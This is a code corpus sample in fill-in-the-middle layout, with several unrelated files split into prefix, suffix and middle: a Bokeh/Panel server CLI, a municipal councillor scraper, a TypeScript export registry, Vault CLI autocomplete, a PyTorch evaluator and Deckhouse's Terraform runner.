@click.option("--ip", default=None, help="Address to listen on")
@click.option(
"--allow-websocket-origin", default=None, multiple=True, help="Web socket origins allowed"
)
@click.option("--debug/--no-debug", default=False, help="To display debug level logs")
@click.option(
"--server", default="bokeh", type=click.STRING, help="The server to use. One of bokeh or panel. Default is bokeh."
)
@click.option(
    "--prefix", default="", type=click.STRING, help="URL prefix (for serving behind a reverse proxy)"
)
@click.argument("command", nargs=-1, required=True)
def run(port, ip, debug, allow_websocket_origin, server, prefix, command):
    if server == "panel":
server = PanelServer(prefix)
else:
server = BokehServer(prefix)
server.run(
port=port,
ip=ip,
debug=debug,
allow_websocket_origin=allow_websocket_origin,
prefix=prefix,
command=command,
)
# Bokeh/ Panel can serve an index page with a list of applications at "/"
# The below is a workaround to avoid including the 'ready-check' application
def _root_handler_initialize_without_ready_check(self, *args, **kw):
kw["applications"]=kw["applications"].copy()
if "/ready-check" in kw["applications"]:
kw["applications"].pop("/ready-check")
self.applications = kw["applications"]
self.prefix = kw["prefix"]
self.index = kw["index"]
self.use_redirect = kw["use_redirect"]
RootHandler.initialize = _root_handler_initialize_without_ready_check
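# NOTE: a hedged sketch of the patch's effect -- with applications
# {"/a": ..., "/b": ..., "/ready-check": ...}, the index page at "/" lists
# only /a and /b, while /ready-check itself keeps serving the readiness app
# (the /a and /b routes are made up).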
if __name__ == "__main__":
try:
run()
except SystemExit as se:
logger.error("Caught SystemExit {}".format(se))
| from panel.io.server import Server as _PnServer
return _PnServer |
people.py | from utils import CSVScraper, CanadianPerson as Person
from pupa.scrape import Organization, Post
from collections import defaultdict
import re
class CanadaMunicipalitiesPersonScraper(CSVScraper):
csv_url = 'https://docs.google.com/spreadsheets/d/e/2PACX-1vRrGXQy8qk16OhuTjlccoGB4jL5e8X1CEqRbg896ufLdh67DQk9nuGm-oufIT0HRMPEnwePw2HDx1Vj/pub?gid=0&single=true&output=csv'
    encoding = 'utf-8'
    def is_valid_row(self, row):
        """
        Returns whether the row should be imported.
        """
return super().is_valid_row(row) and row['organization']
def scrape(self):
| organizations = {}
seat_numbers = defaultdict(lambda: defaultdict(int))
reader = self.csv_reader(self.csv_url, delimiter=self.delimiter, header=True, encoding=self.encoding, skip_rows=self.skip_rows)
reader.fieldnames = [self.header_converter(field) for field in reader.fieldnames]
for row in reader:
try:
if self.is_valid_row(row):
for key, corrections in self.corrections.items():
if not isinstance(corrections, dict):
row[key] = corrections(row[key])
elif row[key] in corrections:
row[key] = corrections[row[key]]
organization_classification = 'legislature'
organization_name = row['organization']
organization_key = organization_name.lower()
if organization_key in organizations:
organization = organizations[organization_key]
else:
organization = Organization(organization_name, classification=organization_classification)
organization.add_source(self.csv_url)
yield organization
organizations[organization_key] = organization
if not row['primary role']:
row['primary role'] = 'Councillor'
role = row['primary role']
post = Post(role=role, label=organization_name, organization_id=organization._id)
yield post
name = row['name'].strip(' .,')
district = row['district name']
if self.many_posts_per_area and role not in self.unique_roles:
seat_numbers[role][district] += 1
district = '{} (seat {})'.format(district, seat_numbers[role][district])
p = Person(primary_org=organization_classification, name=name, district=district, role=role, party=row.get('party name'))
p.add_source(self.csv_url)
if row.get('gender'):
p.gender = row['gender']
if row.get('photo url'):
p.image = row['photo url']
if row.get('source url'):
p.add_source(row['source url'].strip(' .,'))
if row.get('website'):
p.add_link(row['website'], note='web site')
if row.get('facebook'):
p.add_link(re.sub(r'[#?].+', '', row['facebook']))
if row.get('twitter'):
p.add_link(row['twitter'])
if row['email']:
p.add_contact('email', row['email'].strip(' .,'))
if row['address']:
p.add_contact('address', row['address'], 'legislature')
if row.get('phone'):
p.add_contact('voice', row['phone'], 'legislature')
if row.get('fax'):
p.add_contact('fax', row['fax'], 'legislature')
if row.get('cell'):
p.add_contact('cell', row['cell'], 'legislature')
if row.get('birth date'):
p.birth_date = row['birth date']
if row.get('incumbent'):
p.extras['incumbent'] = row['incumbent']
if name in self.other_names:
for other_name in self.other_names[name]:
p.add_name(other_name)
# Validate person entity so that we can catch the exception if needed.
p.validate()
yield p
except Exception as e:
print(repr(e))
continue |
|
DataExportServerController.ts | import IExportHandler from './interfaces/IExportHandler';
export default class DataExportServerController {
public static getInstance() {
if (!DataExportServerController.instance) {
DataExportServerController.instance = new DataExportServerController();
}
return DataExportServerController.instance;
}
private static instance: DataExportServerController = null;
/**
* Local thread cache -----
*/
private registered_export_handlers: { [export_type_id: string]: IExportHandler } = {};
/**
* ----- Local thread cache
*/
private constructor() { }
public register_export_handler(export_type_id: string, exhandler: IExportHandler) {
this.registered_export_handlers[export_type_id] = exhandler; |
get export_handlers(): { [export_type_id: string]: IExportHandler } {
return this.registered_export_handlers;
}
} | } |
base_predict.go | package command
import (
"sort"
"strings"
"sync"
"github.com/hashicorp/vault/api"
"github.com/posener/complete"
)
type Predict struct {
client *api.Client
clientOnce sync.Once
}
func NewPredict() *Predict {
return &Predict{}
}
func (p *Predict) Client() *api.Client {
p.clientOnce.Do(func() {
if p.client == nil { // For tests
client, _ := api.NewClient(nil)
if client.Token() == "" {
helper, err := DefaultTokenHelper()
if err != nil {
return
}
token, err := helper.Get()
if err != nil {
return
}
client.SetToken(token)
}
p.client = client
}
})
return p.client
}
// defaultPredictVaultMounts is the default list of mounts to return to the
// user. This is a best-guess, given we haven't communicated with the Vault
// server. If the user has no token or if the token does not have the default
// policy attached, it won't be able to read cubbyhole/, but it's a better UX
// that returning nothing.
var defaultPredictVaultMounts = []string{"cubbyhole/"}
// predictClient is the API client to use for prediction. We create this at the
// beginning once, because completions are generated for each command (and this
// doesn't change), and the only way to configure the predict/autocomplete
// client is via environment variables. Even if the user specifies a flag, we
// can't parse that flag until after the command is submitted.
var predictClient *api.Client
var predictClientOnce sync.Once
// PredictClient returns the cached API client for the predictor.
func | () *api.Client {
predictClientOnce.Do(func() {
if predictClient == nil { // For tests
predictClient, _ = api.NewClient(nil)
}
})
return predictClient
}
// PredictVaultAvailableMounts returns a predictor for the available mounts in
// Vault. For now, there is no way to programmatically get this list. If, in the
// future, such a list exists, we can adapt it here. Until then, it's
// hard-coded.
func (b *BaseCommand) PredictVaultAvailableMounts() complete.Predictor {
// This list does not contain deprecated backends. At present, there is no
// API that lists all available secret backends, so this is hard-coded :(.
return complete.PredictSet(
"aws",
"consul",
"database",
"generic",
"pki",
"plugin",
"rabbitmq",
"ssh",
"totp",
"transit",
)
}
// PredictVaultAvailableAuths returns a predictor for the available auths in
// Vault. For now, there is no way to programmatically get this list. If, in the
// future, such a list exists, we can adapt it here. Until then, it's
// hard-coded.
func (b *BaseCommand) PredictVaultAvailableAuths() complete.Predictor {
return complete.PredictSet(
"app-id",
"approle",
"aws",
"cert",
"gcp",
"github",
"ldap",
"okta",
"plugin",
"radius",
"userpass",
)
}
// PredictVaultFiles returns a predictor for Vault mounts and paths based on the
// configured client for the base command. Unfortunately this happens pre-flag
// parsing, so users must rely on environment variables for autocomplete if they
// are not using Vault at the default endpoints.
func (b *BaseCommand) PredictVaultFiles() complete.Predictor {
return NewPredict().VaultFiles()
}
// PredictVaultFolders returns a predictor for "folders". See PredictVaultFiles
// for more information and restrictions.
func (b *BaseCommand) PredictVaultFolders() complete.Predictor {
return NewPredict().VaultFolders()
}
// PredictVaultMounts returns a predictor for "folders". See PredictVaultFiles
// for more information and restrictions.
func (b *BaseCommand) PredictVaultMounts() complete.Predictor {
return NewPredict().VaultMounts()
}
// PredictVaultAudits returns a predictor for "folders". See PredictVaultFiles
// for more information and restrictions.
func (b *BaseCommand) PredictVaultAudits() complete.Predictor {
return NewPredict().VaultAudits()
}
// PredictVaultAuths returns a predictor for "folders". See PredictVaultFiles
// for more information and restrictions.
func (b *BaseCommand) PredictVaultAuths() complete.Predictor {
return NewPredict().VaultAuths()
}
// PredictVaultPolicies returns a predictor for "folders". See PredictVaultFiles
// for more information and restrictions.
func (b *BaseCommand) PredictVaultPolicies() complete.Predictor {
return NewPredict().VaultPolicies()
}
// VaultFiles returns a predictor for Vault "files". This is a public API for
// consumers, but you probably want BaseCommand.PredictVaultFiles instead.
func (p *Predict) VaultFiles() complete.Predictor {
return p.vaultPaths(true)
}
// VaultFolders returns a predictor for Vault "folders". This is a public
// API for consumers, but you probably want BaseCommand.PredictVaultFolders
// instead.
func (p *Predict) VaultFolders() complete.Predictor {
return p.vaultPaths(false)
}
// VaultMounts returns a predictor for Vault mounts. This is a public
// API for consumers, but you probably want BaseCommand.PredictVaultMounts
// instead.
func (p *Predict) VaultMounts() complete.Predictor {
return p.filterFunc(p.mounts)
}
// VaultAudits returns a predictor for Vault audit devices. This is a public API for
// consumers, but you probably want BaseCommand.PredictVaultAudits instead.
func (p *Predict) VaultAudits() complete.Predictor {
return p.filterFunc(p.audits)
}
// VaultAuths returns a predictor for Vault auth methods. This is a public API for
// consumers, but you probably want BaseCommand.PredictVaultAuths instead.
func (p *Predict) VaultAuths() complete.Predictor {
return p.filterFunc(p.auths)
}
// VaultPolicies returns a predictor for Vault policies. This is a public API for
// consumers, but you probably want BaseCommand.PredictVaultPolicies instead.
func (p *Predict) VaultPolicies() complete.Predictor {
return p.filterFunc(p.policies)
}
// vaultPaths parses the CLI options and returns the "best" list of possible
// paths. If there are any errors, this function returns an empty result. All
// errors are suppressed since this is a prediction function.
func (p *Predict) vaultPaths(includeFiles bool) complete.PredictFunc {
return func(args complete.Args) []string {
		// Do not predict more than one path
if p.hasPathArg(args.All) {
return nil
}
client := p.Client()
if client == nil {
return nil
}
path := args.Last
var predictions []string
if strings.Contains(path, "/") {
predictions = p.paths(path, includeFiles)
} else {
predictions = p.filter(p.mounts(), path)
}
// Either no results or many results, so return.
if len(predictions) != 1 {
return predictions
}
// If this is not a "folder", do not try to recurse.
if !strings.HasSuffix(predictions[0], "/") {
return predictions
}
		// If the prediction is the same as the last guess, return it (we have no
		// new information and won't get any more).
if predictions[0] == args.Last {
return predictions
}
// Re-predict with the remaining path
args.Last = predictions[0]
return p.vaultPaths(includeFiles).Predict(args)
}
}
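// Illustrative walk-through of vaultPaths (a sketch assuming a server with a
// "secret/" mount that contains the keys "foo" and "foo/"):
//
//	input "sec"      -> filter(mounts(), "sec")      -> ["secret/"] (one folder, recurse)
//	input "secret/"  -> paths("secret/", files)      -> ["secret/foo", "secret/foo/"]
//	two results      -> returned as-is for the shell to display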
// paths predicts all paths which start with the given path.
func (p *Predict) paths(path string, includeFiles bool) []string {
client := p.Client()
if client == nil {
return nil
}
// Vault does not support listing based on a sub-key, so we have to back-pedal
// to the last "/" and return all paths on that "folder". Then we perform
// client-side filtering.
root := path
idx := strings.LastIndex(root, "/")
if idx > 0 && idx < len(root) {
root = root[:idx+1]
}
paths := p.listPaths(root)
var predictions []string
for _, p := range paths {
// Calculate the absolute "path" for matching.
p = root + p
if strings.HasPrefix(p, path) {
// Ensure this is a directory or we've asked to include files.
if includeFiles || strings.HasSuffix(p, "/") {
predictions = append(predictions, p)
}
}
}
	// Fall back to the original path if nothing matched.
if len(predictions) == 0 {
predictions = append(predictions, path)
}
return predictions
}
// audits returns a sorted list of the audit backends for the Vault server
// the client is configured to communicate with.
func (p *Predict) audits() []string {
client := p.Client()
if client == nil {
return nil
}
audits, err := client.Sys().ListAudit()
if err != nil {
return nil
}
list := make([]string, 0, len(audits))
for m := range audits {
list = append(list, m)
}
sort.Strings(list)
return list
}
// auths returns a sorted list of the enabled auth providers for the Vault
// server the client is configured to communicate with.
func (p *Predict) auths() []string {
client := p.Client()
if client == nil {
return nil
}
auths, err := client.Sys().ListAuth()
if err != nil {
return nil
}
list := make([]string, 0, len(auths))
for m := range auths {
list = append(list, m)
}
sort.Strings(list)
return list
}
// policies returns a sorted list of the policies stored in this Vault
// server.
func (p *Predict) policies() []string {
client := p.Client()
if client == nil {
return nil
}
policies, err := client.Sys().ListPolicies()
if err != nil {
return nil
}
sort.Strings(policies)
return policies
}
// mounts returns a sorted list of the mount paths for the Vault server the
// client is configured to communicate with. This function returns the
// default list of mounts if an error occurs.
func (p *Predict) mounts() []string {
client := p.Client()
if client == nil {
return nil
}
mounts, err := client.Sys().ListMounts()
if err != nil {
return defaultPredictVaultMounts
}
list := make([]string, 0, len(mounts))
for m := range mounts {
list = append(list, m)
}
sort.Strings(list)
return list
}
// listPaths returns a list of paths (HTTP LIST) for the given path. This
// function returns an empty list if any errors occur.
func (p *Predict) listPaths(path string) []string {
client := p.Client()
if client == nil {
return nil
}
secret, err := client.Logical().List(path)
if err != nil || secret == nil || secret.Data == nil {
return nil
}
paths, ok := secret.Data["keys"].([]interface{})
if !ok {
return nil
}
list := make([]string, 0, len(paths))
for _, p := range paths {
if str, ok := p.(string); ok {
list = append(list, str)
}
}
sort.Strings(list)
return list
}
// hasPathArg determines if the args have already accepted a path.
func (p *Predict) hasPathArg(args []string) bool {
var nonFlags []string
for _, a := range args {
if !strings.HasPrefix(a, "-") {
nonFlags = append(nonFlags, a)
}
}
return len(nonFlags) > 2
}
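// Note: the exact contents of args.All depend on how the complete library
// tokenizes the command line; the assumption encoded above is that more than
// two non-flag words (e.g. something like ["vault", "read", "secret/foo"])
// means a path argument has already been supplied.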
// filterFunc is used to compose a complete predictor that filters an array
// of strings as per the filter function.
func (p *Predict) filterFunc(f func() []string) complete.Predictor {
return complete.PredictFunc(func(args complete.Args) []string {
if p.hasPathArg(args.All) {
return nil
}
client := p.Client()
if client == nil {
return nil
}
return p.filter(f(), args.Last)
})
}
// filter filters the given list for items that start with the prefix.
func (p *Predict) filter(list []string, prefix string) []string {
var predictions []string
for _, item := range list {
if strings.HasPrefix(item, prefix) {
predictions = append(predictions, item)
}
}
return predictions
}
| PredictClient |
evaluator.py | __all__ = ["EvaluatingInferencer"]
from dataclasses import dataclass
from typing import Sequence
import torch
import torch.utils.data as td
import utils
from datasets import BatchData
from .inferencer import Inferencer
from evaluators import FinegrainedEvaluator
@dataclass
class EvaluatingInferencer(Inferencer):
evaluators: Sequence[FinegrainedEvaluator] = tuple()
_requires_lexical_form: bool = utils.private_field(default=False)
def __post_init__(self):
|
def on_run_started(self, dataloader: td.DataLoader) -> td.DataLoader:
dataloader = super().on_run_started(dataloader)
for evaluator in self.evaluators:
evaluator.reset()
return dataloader
def on_batch_ended(self, batch: BatchData, pred: BatchData, outputs
) -> utils.TensorMap:
stats = dict(super().on_batch_ended(batch, pred, outputs))
batch_lex, pred_lex = None, None
if self._requires_lexical_form:
batch_lex = list(map(self.processor.lexicalize_global, batch))
pred_lex = list(map(self.processor.lexicalize_global, pred))
with torch.no_grad():
for evaluator in self.evaluators:
if evaluator.requires_lexical_form:
eval_stats = evaluator.update(batch_lex, pred_lex, outputs)
else:
eval_stats = evaluator.update(batch, pred, outputs)
stats.update(eval_stats or dict())
return stats
def on_run_ended(self, stats: utils.TensorMap) -> utils.TensorMap:
stats = dict(super().on_run_ended(stats))
with torch.no_grad():
for evaluator in self.evaluators:
stats.update(evaluator.get() or dict())
return stats
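# Illustrative usage (a sketch; the concrete evaluator classes, the remaining
# constructor arguments, and the invocation style are assumptions, not taken
# from this file):
#
#   inferencer = EvaluatingInferencer(
#       model=model,
#       processor=processor,
#       evaluators=(BleuEvaluator(), DistinctEvaluator()),
#   )
#   stats = inferencer(test_dataloader)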
| super().__post_init__()
self._requires_lexical_form = any(e.requires_lexical_form
for e in self.evaluators) |
runner.go | // Copyright 2021 Flant CJSC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package terraform
import (
"bufio"
"bytes"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"os/exec"
"path/filepath"
"syscall"
"time"
"github.com/hashicorp/go-multierror"
"github.com/deckhouse/deckhouse/dhctl/pkg/app"
"github.com/deckhouse/deckhouse/dhctl/pkg/config"
"github.com/deckhouse/deckhouse/dhctl/pkg/log"
"github.com/deckhouse/deckhouse/dhctl/pkg/state"
"github.com/deckhouse/deckhouse/dhctl/pkg/state/cache"
"github.com/deckhouse/deckhouse/dhctl/pkg/util/input"
)
const (
deckhouseClusterStateSuffix = "-dhctl.*.tfstate"
deckhousePlanSuffix = "-dhctl.*.tfplan"
cloudProvidersDir = "/deckhouse/candi/cloud-providers/"
varFileName = "cluster-config.auto.*.tfvars.json"
terraformHasChangesExitCode = 2
terraformPipelineAbortedMessage = `
Terraform pipeline aborted.
If you want to drop the cache and continue, please run dhctl with the "--yes-i-want-to-drop-cache" flag.
`
)
const (
PlanHasNoChanges = iota
PlanHasChanges
PlanHasDestructiveChanges
)
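// changesInPlan transitions: Plan() sets PlanHasChanges when terraform exits
// with code 2 (from -detailed-exitcode) and upgrades it to
// PlanHasDestructiveChanges when the rendered plan contains a "delete" action.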
var (
ErrRunnerStopped = errors.New("Terraform runner was stopped.")
ErrTerraformApplyAborted = errors.New("Terraform apply aborted.")
)
type ChangeActionSettings struct {
AutoDismissDestructive bool
AutoApprove bool
SkipChangesOnDeny bool
}
type Runner struct {
name string
prefix string
step string
workingDir string
statePath string
planPath string
variablesPath string
changeSettings ChangeActionSettings
allowedCachedState bool
changesInPlan int
stateCache state.Cache
stateSaver *StateSaver
cmd *exec.Cmd
confirm func() *input.Confirmation
stopped bool
}
func NewRunner(provider, prefix, layout, step string) *Runner {
return &Runner{
prefix: prefix,
step: step,
name: step,
workingDir: buildTerraformPath(provider, layout, step),
confirm: input.NewConfirmation,
stateCache: cache.Global(),
changeSettings: ChangeActionSettings{},
}
}
func NewRunnerFromConfig(cfg *config.MetaConfig, step string) *Runner {
return NewRunner(cfg.ProviderName, cfg.ClusterPrefix, cfg.Layout, step)
}
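// Illustrative usage (a sketch; the step name and variables payload are
// assumptions, not taken from this file):
//
//	runner := NewRunnerFromConfig(metaConfig, "base-infrastructure").
//		WithVariables(varsJSON).
//		WithAutoApprove(true)
//	if err := runner.Init(); err != nil { /* handle */ }
//	if err := runner.Plan(); err != nil { /* handle */ }
//	if err := runner.Apply(); err != nil { /* handle */ }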
func (r *Runner) WithCache(cache state.Cache) *Runner {
r.stateCache = cache
return r
}
func (r *Runner) WithName(name string) *Runner {
r.name = name
return r
}
func (r *Runner) WithConfirm(confirm func() *input.Confirmation) *Runner {
r.confirm = confirm
return r
}
func (r *Runner) WithStatePath(statePath string) *Runner {
r.statePath = statePath
return r
}
func (r *Runner) WithState(stateData []byte) *Runner {
tmpFile, err := ioutil.TempFile(app.TmpDirName, r.step+deckhouseClusterStateSuffix)
if err != nil {
log.ErrorF("can't save terraform state for runner %s: %s\n", r.step, err)
return r
}
err = ioutil.WriteFile(tmpFile.Name(), stateData, 0o600)
if err != nil {
log.ErrorF("can't write terraform state for runner %s: %s\n", r.step, err)
return r
}
r.statePath = tmpFile.Name()
return r
}
func (r *Runner) WithVariables(variablesData []byte) *Runner {
tmpFile, err := ioutil.TempFile(app.TmpDirName, varFileName)
if err != nil {
log.ErrorF("can't save terraform variables for runner %s: %s\n", r.step, err)
return r
}
err = ioutil.WriteFile(tmpFile.Name(), variablesData, 0o600)
if err != nil {
log.ErrorF("can't write terraform variables for runner %s: %s\n", r.step, err)
return r
}
r.variablesPath = tmpFile.Name()
return r
}
func (r *Runner) WithAutoApprove(flag bool) *Runner {
r.changeSettings.AutoApprove = flag
return r
}
func (r *Runner) WithAutoDismissDestructiveChanges(flag bool) *Runner {
r.changeSettings.AutoDismissDestructive = flag
return r
}
func (r *Runner) WithAllowedCachedState(flag bool) *Runner {
r.allowedCachedState = flag
return r
}
func (r *Runner) WithSkipChangesOnDeny(flag bool) *Runner {
r.changeSettings.SkipChangesOnDeny = flag
return r
}
func (r *Runner) WithIntermediateStateSaver(saver *StateSaver) *Runner {
r.stateSaver = saver
return r
}
func (r *Runner) Init() error {
if r.stopped {
return ErrRunnerStopped
}
if r.statePath == "" {
// Save state directly in the cache to prevent state loss
stateName := r.stateName()
r.statePath = r.stateCache.GetPath(stateName)
if r.stateCache.InCache(stateName) {
log.InfoF("Cached Terraform state found:\n\t%s\n\n", r.statePath)
if !r.allowedCachedState {
var isConfirm bool
switch app.UseTfCache {
case app.UseStateCacheYes:
isConfirm = true
case app.UseStateCacheNo:
isConfirm = false
default:
isConfirm = r.confirm().
WithMessage("Do you want to continue with Terraform state from local cache?").
WithYesByDefault().
Ask()
}
if !isConfirm {
return fmt.Errorf(terraformPipelineAbortedMessage)
}
}
stateData := r.stateCache.Load(stateName)
if len(stateData) > 0 {
err := ioutil.WriteFile(r.statePath, stateData, 0o600)
if err != nil {
err := fmt.Errorf("can't write terraform state for runner %s: %s", r.step, err)
log.ErrorLn(err)
return err
}
}
}
}
	// If statePath is still empty, something went wrong with the cache. Create a file for the state in the tmp directory.
if r.statePath == "" {
r.WithState(nil)
}
return log.Process("default", "terraform init ...", func() error {
args := []string{
"init",
"-get-plugins=false",
"-no-color",
"-input=false",
fmt.Sprintf("-var-file=%s", r.variablesPath),
r.workingDir,
}
_, err := r.execTerraform(args...)
return err
})
}
func (r *Runner) stateName() string {
return fmt.Sprintf("%s.tfstate", r.name)
}
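// handleChanges inspects the result of the last plan and decides whether the
// apply step should be skipped. It returns (true, nil) to skip the apply,
// (false, nil) to proceed, and ErrTerraformApplyAborted when the user denies
// the change and SkipChangesOnDeny is not set.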
func (r *Runner) handleChanges() (bool, error) {
	// First, handle destructive changes: skip the apply when they are auto-dismissed.
if r.changesInPlan == PlanHasDestructiveChanges && r.changeSettings.AutoDismissDestructive {
// skip plan
return true, nil
}
if r.changeSettings.AutoApprove || r.changesInPlan == PlanHasNoChanges {
return false, nil
}
if !r.confirm().WithMessage("Do you want to CHANGE objects state in the cloud?").Ask() {
if r.changeSettings.SkipChangesOnDeny {
return true, nil
}
return false, ErrTerraformApplyAborted
}
return false, nil
}
func (r *Runner) Apply() error {
if r.stopped {
return ErrRunnerStopped
}
return log.Process("default", "terraform apply ...", func() error {
var err error
if r.stateSaver != nil {
err = r.stateSaver.Start(r)
if err != nil {
return err
}
defer r.stateSaver.Stop()
}
skip, err := r.handleChanges()
if err != nil {
return err
}
if skip {
log.InfoLn("Skip terraform apply.")
return nil
}
args := []string{
"apply",
"-input=false",
"-no-color",
"-auto-approve",
fmt.Sprintf("-state=%s", r.statePath),
fmt.Sprintf("-state-out=%s", r.statePath),
}
if r.planPath != "" {
args = append(args, r.planPath)
} else {
args = append(args,
fmt.Sprintf("-var-file=%s", r.variablesPath),
r.workingDir,
)
}
var allErrs *multierror.Error
_, err = r.execTerraform(args...)
if err != nil {
allErrs = multierror.Append(allErrs, err)
			// Intentionally no return here: the state must still be added to the cache.
}
data, err := r.getState()
if err != nil {
allErrs = multierror.Append(allErrs, err)
			// Couldn't read the state, so return all accumulated errors.
return allErrs.ErrorOrNil()
}
err = r.stateCache.Save(r.stateName(), data)
if err != nil {
allErrs = multierror.Append(allErrs, err)
}
return allErrs.ErrorOrNil()
})
}
func (r *Runner) Plan() error {
if r.stopped {
return ErrRunnerStopped
}
return log.Process("default", "terraform plan ...", func() error {
tmpFile, err := ioutil.TempFile(app.TmpDirName, r.step+deckhousePlanSuffix)
if err != nil {
return fmt.Errorf("can't create temp file for plan: %w", err)
}
args := []string{
"plan",
"-input=false",
"-no-color",
"-detailed-exitcode",
fmt.Sprintf("-var-file=%s", r.variablesPath),
fmt.Sprintf("-state=%s", r.statePath),
fmt.Sprintf("-out=%s", tmpFile.Name()),
}
args = append(args, r.workingDir)
exitCode, err := r.execTerraform(args...)
if exitCode == terraformHasChangesExitCode {
r.changesInPlan = PlanHasChanges
hasDestructiveChanges, err := checkPlanDestructiveChanges(tmpFile.Name())
if err != nil {
return err
}
if hasDestructiveChanges {
r.changesInPlan = PlanHasDestructiveChanges
}
} else if err != nil {
return err
}
r.planPath = tmpFile.Name()
return nil
})
}
func (r *Runner) GetTerraformOutput(output string) ([]byte, error) {
if r.stopped {
return nil, ErrRunnerStopped
}
if r.statePath == "" {
return nil, fmt.Errorf("no state found, try to run terraform apply first")
}
args := []string{
"output",
"-no-color",
"-json",
fmt.Sprintf("-state=%s", r.statePath),
}
args = append(args, output)
result, err := terraformCmd(args...).Output()
if err != nil {
if ee, ok := err.(*exec.ExitError); ok {
err = fmt.Errorf("%s\n%v", string(ee.Stderr), err)
}
return nil, fmt.Errorf("can't get terraform output for %q\n%v", output, err)
}
return result, nil
}
func (r *Runner) Destroy() error {
if r.stopped {
return ErrRunnerStopped
}
if r.statePath == "" {
return fmt.Errorf("no state found, try to run terraform apply first")
}
if r.changeSettings.AutoDismissDestructive {
log.InfoLn("terraform destroy skipped")
return nil
} | if !r.changeSettings.AutoApprove {
if !r.confirm().WithMessage("Do you want to DELETE objects from the cloud?").Ask() {
return fmt.Errorf("terraform destroy aborted")
}
}
// TODO: why is this line here?
// r.stopped = true
return log.Process("default", "terraform destroy ...", func() error {
var err error
if r.stateSaver != nil {
err = r.stateSaver.Start(r)
if err != nil {
return err
}
defer r.stateSaver.Stop()
}
args := []string{
"destroy",
"-no-color",
"-auto-approve",
fmt.Sprintf("-var-file=%s", r.variablesPath),
fmt.Sprintf("-state=%s", r.statePath),
}
args = append(args, r.workingDir)
if _, err = r.execTerraform(args...); err != nil {
return err
}
return nil
})
}
func (r *Runner) ResourcesQuantityInState() int {
if r.statePath == "" {
return 0
}
data, err := ioutil.ReadFile(r.statePath)
if err != nil {
log.ErrorLn(err)
return 0
}
var st struct {
Resources []json.RawMessage `json:"resources"`
}
err = json.Unmarshal(data, &st)
if err != nil {
log.ErrorLn(err)
return 0
}
return len(st.Resources)
}
func (r *Runner) getState() ([]byte, error) {
return ioutil.ReadFile(r.statePath)
}
// Stop interrupts the current runner command and sets
// a flag to prevent execution of subsequent runner commands.
func (r *Runner) Stop() {
if r.cmd != nil && !r.stopped {
log.DebugF("Runner Stop is called for %s. Interrupt terraform process by pid: %d\n", r.name, r.cmd.Process.Pid)
	// 1. Terraform exits immediately on SIGTERM, so SIGINT is used here
	// to interrupt it gracefully even when the main process caught a SIGTERM.
// 2. Negative pid is used to send signal to the process group
// started by "Setpgid: true" to prevent double signaling
// from shell and from us.
// See also pkg/system/ssh/cmd/ssh.go
_ = syscall.Kill(-r.cmd.Process.Pid, syscall.SIGINT)
}
r.stopped = true
// Wait until the running terraform command stops.
for r.cmd != nil {
time.Sleep(50 * time.Millisecond)
}
// Wait until the StateSaver saves the Secret for Apply and Destroy commands.
if r.stateSaver != nil && r.stateSaver.IsStarted() {
<-r.stateSaver.DoneCh()
}
}
func (r *Runner) execTerraform(args ...string) (int, error) {
r.cmd = terraformCmd(args...)
	// Start terraform as the leader of a new process group to prevent
	// os.Interrupt (SIGINT) signals from the shell when Ctrl-C is pressed.
r.cmd.SysProcAttr = &syscall.SysProcAttr{
Setpgid: true,
}
stdout, err := r.cmd.StdoutPipe()
if err != nil {
return 1, fmt.Errorf("stdout pipe: %v", err)
}
stderr, err := r.cmd.StderrPipe()
if err != nil {
return 1, fmt.Errorf("stderr pipe: %v", err)
}
log.DebugLn(r.cmd.String())
err = r.cmd.Start()
if err != nil {
log.ErrorLn(err)
return r.cmd.ProcessState.ExitCode(), err
}
var errBuf bytes.Buffer
waitCh := make(chan error)
go func() {
e := bufio.NewScanner(stderr)
for e.Scan() {
if app.IsDebug {
log.DebugLn(e.Text())
} else {
errBuf.WriteString(e.Text() + "\n")
}
}
waitCh <- r.cmd.Wait()
}()
s := bufio.NewScanner(stdout)
for s.Scan() {
log.InfoLn(s.Text())
}
err = <-waitCh
log.InfoF("Terraform runner %q process exited.\n", r.step)
	exitCode := r.cmd.ProcessState.ExitCode() // exit code 2 means terraform plan found changes
if err != nil && exitCode != terraformHasChangesExitCode {
log.ErrorLn(err)
err = fmt.Errorf(errBuf.String())
if app.IsDebug {
err = fmt.Errorf("terraform has failed in DEBUG mode, search in the output above for an error")
}
}
r.cmd = nil
if exitCode == 0 {
err = nil
}
return exitCode, err
}
func buildTerraformPath(provider, layout, step string) string {
return filepath.Join(cloudProvidersDir, provider, "layouts", layout, step)
}
func terraformCmd(args ...string) *exec.Cmd {
cmd := exec.Command("terraform", args...)
cmd.Env = append(
cmd.Env,
"TF_IN_AUTOMATION=yes", "TF_DATA_DIR="+filepath.Join(app.TmpDirName, "tf_dhctl"),
)
if app.IsDebug {
		// The DEBUG level is deprecated, but TRACE produces even more (mostly useless) output, so DEBUG is used here.
cmd.Env = append(cmd.Env, "TF_LOG=DEBUG")
}
return cmd
}
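// checkPlanDestructiveChanges renders the saved plan with "terraform show
// -json" and reports whether any resource change includes a "delete" action.
// A destructive entry in the rendered plan looks roughly like:
//
//	{"resource_changes": [{"change": {"actions": ["delete", "create"]}}]}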
func checkPlanDestructiveChanges(planFile string) (bool, error) {
args := []string{
"show",
"-json",
planFile,
}
result, err := terraformCmd(args...).Output()
if err != nil {
var ee *exec.ExitError
if ok := errors.As(err, &ee); ok {
err = fmt.Errorf("%s\n%v", string(ee.Stderr), err)
}
return false, fmt.Errorf("can't get terraform plan for %q\n%v", planFile, err)
}
var changes struct {
ResourcesChanges []struct {
Change struct {
Actions []string `json:"actions"`
} `json:"change"`
} `json:"resource_changes"`
}
err = json.Unmarshal(result, &changes)
if err != nil {
return false, err
}
for _, resource := range changes.ResourcesChanges {
for _, action := range resource.Change.Actions {
if action == "delete" {
return true, nil
}
}
}
return false, nil
} | |
input.rs | // Code generated by software.amazon.smithy.rust.codegen.smithy-rs. DO NOT EDIT.
use std::fmt::Write;
/// See [`DeleteAlarmsInput`](crate::input::DeleteAlarmsInput)
pub mod delete_alarms_input {
/// A builder for [`DeleteAlarmsInput`](crate::input::DeleteAlarmsInput)
#[non_exhaustive]
